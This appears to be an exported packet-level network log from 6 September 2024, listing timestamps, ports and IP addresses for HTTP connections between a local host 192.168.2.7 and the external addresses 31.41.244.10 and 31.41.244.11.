Sep 6, 2024 09:58:07.291695118 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.291702032 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.291745901 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.291754961 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.291762114 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.291786909 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.291795969 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.291807890 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.291825056 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.291856050 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.291862965 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.291906118 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.291954041 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.291960001 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.291971922 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.291981936 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.291985989 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.291990995 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.291996002 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292004108 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292011976 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.292064905 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292073011 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.292156935 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292162895 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292170048 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292175055 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292181969 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292205095 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292244911 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.292265892 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292272091 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292279005 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.292314053 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.292323112 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292335033 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292346954 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292354107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292371035 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292387009 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.292403936 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.292536974 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292545080 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292551041 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292598963 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.292608976 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292614937 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292620897 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292628050 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.292633057 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292665005 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292701006 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.292712927 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.292718887 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292779922 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.292815924 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292820930 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292829990 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292834997 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292845011 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292879105 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.292907953 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.292937994 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.294405937 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294424057 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294430971 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294444084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294459105 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294461012 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.294475079 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294481993 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294491053 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.294495106 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294524908 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.294533014 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.294537067 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294584990 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.294616938 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294622898 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294629097 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294636011 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294671059 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.294698000 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294709921 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294715881 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294720888 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294744968 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.294749022 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294754982 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294766903 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.294768095 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294776917 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294801950 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.294819117 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294826031 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.294861078 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.294913054 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294919968 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294925928 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.294954062 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.295007944 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.295020103 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.295022964 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.295030117 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.295032024 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.295044899 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.295078039 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.295103073 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.295109987 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.295121908 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.295128107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.295134068 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.295139074 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.295160055 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.295171022 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.295182943 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.323530912 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.323549032 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.323556900 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.323563099 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.323570013 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.323585033 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.323611975 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.323666096 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:08.037729979 CEST	49717	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:08.038099051 CEST	49720	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:08.043121099 CEST	80	49717	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:08.043246031 CEST	80	49720	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:08.043251991 CEST	49717	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:08.043340921 CEST	49720	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:08.043541908 CEST	49720	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:08.048434019 CEST	80	49720	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:08.750566959 CEST	80	49720	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:08.750627995 CEST	49720	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:08.751851082 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:08.752144098 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:08.756937027 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:08.756999969 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:08.757066965 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:08.757311106 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:08.757496119 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:08.762259960 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.448220968 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.448242903 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.448250055 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.448256016 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.448261023 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.448266983 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.448272943 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.448280096 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.448292017 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.448298931 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.448307991 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.448393106 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.453196049 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.453207016 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.453258038 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.453308105 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.453372955 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.574440956 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.574476004 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.574482918 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.574496984 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.574502945 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.574511051 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.574532032 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.574575901 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.575197935 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.575208902 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.575222015 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.575228930 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.575274944 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.575295925 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.575705051 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.575712919 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.575719118 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.575752974 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.575799942 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.575849056 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.575860977 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.575862885 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.575896978 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.575912952 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.576546907 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.576555967 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.576570034 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.576606989 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.576636076 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.576668978 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.576675892 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.576683998 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.576714039 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.576730013 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.577563047 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.577574015 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.577646017 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.580878019 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.580889940 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.580956936 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.581006050 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.581052065 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.697496891 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.697510004 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.697526932 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.697597980 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.697597027 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.697604895 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.697618008 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.697623968 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.697658062 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.697664022 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.697694063 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.697705984 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.697837114 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.697844028 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.697849989 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.697856903 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.697890043 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.697921038 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.698201895 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.698206902 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.698213100 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.698219061 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.698260069 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.698498964 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.698506117 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.698512077 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.698545933 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.698570013 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.698646069 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.698651075 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.698662996 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.698700905 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.699060917 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699067116 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699078083 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699122906 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.699126005 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699139118 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699152946 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699157953 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699163914 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699174881 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699181080 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.699204922 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.699843884 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699856043 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699867964 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699939966 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699939966 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.699947119 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699951887 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699956894 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699961901 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699966908 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699980974 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.699990034 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.700020075 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.700907946 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.701013088 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.701016903 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.701025009 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.701035976 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.701040983 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.701046944 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.701060057 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.701065063 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.701066971 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.701095104 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.701122999 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.702507019 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.702512980 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.702581882 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.822128057 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822252989 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.822324991 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822334051 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822349072 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822375059 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.822381973 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822388887 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822393894 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822398901 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822413921 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822419882 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822432041 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.822437048 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822452068 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822458029 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822463989 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822463989 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.822477102 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822482109 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822487116 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822489023 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.822493076 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822500944 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822529078 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.822566032 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.822590113 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822596073 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822602034 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822607994 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822613955 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822640896 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.822666883 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.822750092 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822766066 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822777033 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822784901 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822834969 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.822860003 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822869062 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822910070 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.822912931 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822917938 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822936058 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822951078 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.822963953 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.823005915 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.823012114 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823044062 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823076010 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823082924 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.823122978 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.823180914 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823187113 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823199034 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823204041 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823215008 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823220968 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823247910 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.823287964 CEST	49721	80	192.168.2.7	31.41.244.11
